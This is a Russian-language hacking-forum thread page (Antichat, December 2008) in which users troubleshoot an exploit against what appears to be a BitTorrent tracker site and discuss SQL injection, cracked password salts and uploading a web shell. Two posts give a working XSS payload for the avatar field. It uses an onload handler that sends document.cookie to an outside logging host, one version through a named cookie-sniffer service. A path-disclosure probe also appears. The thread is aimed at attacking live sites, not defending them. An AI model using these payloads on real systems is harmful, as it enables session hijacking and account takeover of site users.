HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #51  
Старый 19.12.2008, 20:23
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами: 11020706

Репутация: 4693


По умолчанию

Цитата:
Сообщение от OMG!!  
Qwazar, там оленизмом страдает народ.. я в чате написал, друзья .. как залатать дыры от этих багов, и ссылку на ачат кинул.. в итоге словил бан с ризоном " в чате помощи не просят" зафига тогда чат.. оффтоп. вообщем, спасибо.. буду искать
Ну у них же там на главной написано

Вот, в общем, топик где были предложены их исправления. Имхо нифига не элегантно и порой избыточно, но: http://bit-torrent.kiev.ua/bnovlenie...ex.html?t=3319
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием

  #52  
Старый 20.12.2008, 16:51
Arigona
Banned
Регистрация: 09.12.2008
Сообщений: 142
С нами: 9168806

Репутация: 114
По умолчанию

У меня при использовании сполйта пишет что неверные куки, pass incorect, хотя всё правильно. ЧТо не так?
 
Ответить с цитированием

  #53  
Старый 20.12.2008, 17:04
DREASTY
Познающий
Регистрация: 19.11.2007
Сообщений: 81
С нами: 9724301

Репутация: 52
По умолчанию

Arigona
Посмотри чтоб в конце адресса был слеш!
http://target.com/ 1 bla bla
у меня именно в слеше была проблема!
 
Ответить с цитированием

  #54  
Старый 20.12.2008, 17:15
Arigona
Banned
Регистрация: 09.12.2008
Сообщений: 142
С нами: 9168806

Репутация: 114
По умолчанию

Тоже самое

Trying to get your cookies... Can't get cookies.. Pass incorrect?
 
Ответить с цитированием

  #55  
Старый 20.12.2008, 17:53
злойдядька
Новичок
Регистрация: 20.11.2008
Сообщений: 10
С нами: 9195672

Репутация: 16
По умолчанию

Цитата:
Сообщение от Dimazzan  
Эта штука не пашет!!!
все прекрасно пашет, читай ман по SQL, разве не видиш что ругается на синтаксис ? значит скуля есть, тоько ты пишеш не правельно! Вообщем патч хендс

з.ы. если прочтеш внимательно мой пост с багой то там написано ПРИМЕР, тоесть это пример конкретно для сайта на котором это проделывал я, у вас и версия SQL может быть другая и путь другой, как найти путь написано в этой же теме, поэтому если у вас не хватает знаний чтобы заюзать багу, то не нужно кричать что она не пашет!

Последний раз редактировалось злойдядька; 20.12.2008 в 17:58..
 
Ответить с цитированием

  #56  
Старый 20.12.2008, 19:36
Arigona
Banned
Регистрация: 09.12.2008
Сообщений: 142
С нами: 9168806

Репутация: 114
По умолчанию

А вот у меня сломало и соль, для чего она и как её использовать?
 
Ответить с цитированием

  #57  
Старый 20.12.2008, 22:04
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
С нами: 10061666

Репутация: 2438
По умолчанию

В настройках профиля во вкладке аватар можно реализовать XSS:

Код:
http://host.org/1.jpg onload= location.href='http://host.org/log.php?c='+document.cookie;//
 
Ответить с цитированием

  #58  
Старый 21.12.2008, 09:44
Arigona
Banned
Регистрация: 09.12.2008
Сообщений: 142
С нами: 9168806

Репутация: 114
По умолчанию

Qwazar, понял.

А возможно реализовть сплоит под другую sql уязвимость? У многих нет requests.php просто..

вот раскрытый путь обнаружил:


details.php?id[]=

мне кажеться тут что-то скрывается
 
Ответить с цитированием

  #59  
Старый 21.12.2008, 11:13
Arigona
Banned
Регистрация: 09.12.2008
Сообщений: 142
С нами: 9168806

Репутация: 114
По умолчанию

baltazar, как?

ВОт если я пользуюсь снифером na-s.ru

http://google/1.jpg onload= location.href='http://na-s.ru/limage.jpg?c='+document.cookie;//



Правильно?
 
Ответить с цитированием

  #60  
Старый 21.12.2008, 16:11
Arigona
Banned
Регистрация: 09.12.2008
Сообщений: 142
С нами: 9168806

Репутация: 114
По умолчанию

Как можно загрузить шелл имея админа? Реально такое?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Прошивку iPhone 2.0 взломали ещё до её выхода geforse Мировые новости. Обсуждения. 1 14.07.2008 22:41
Web 2.0 выходит на государственный уровень vadim399 Мировые новости. Обсуждения. 2 12.01.2008 18:06
Проложение витых пар в городских домах Рогатый Трупоед "Железо" 11 20.09.2004 09:08



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.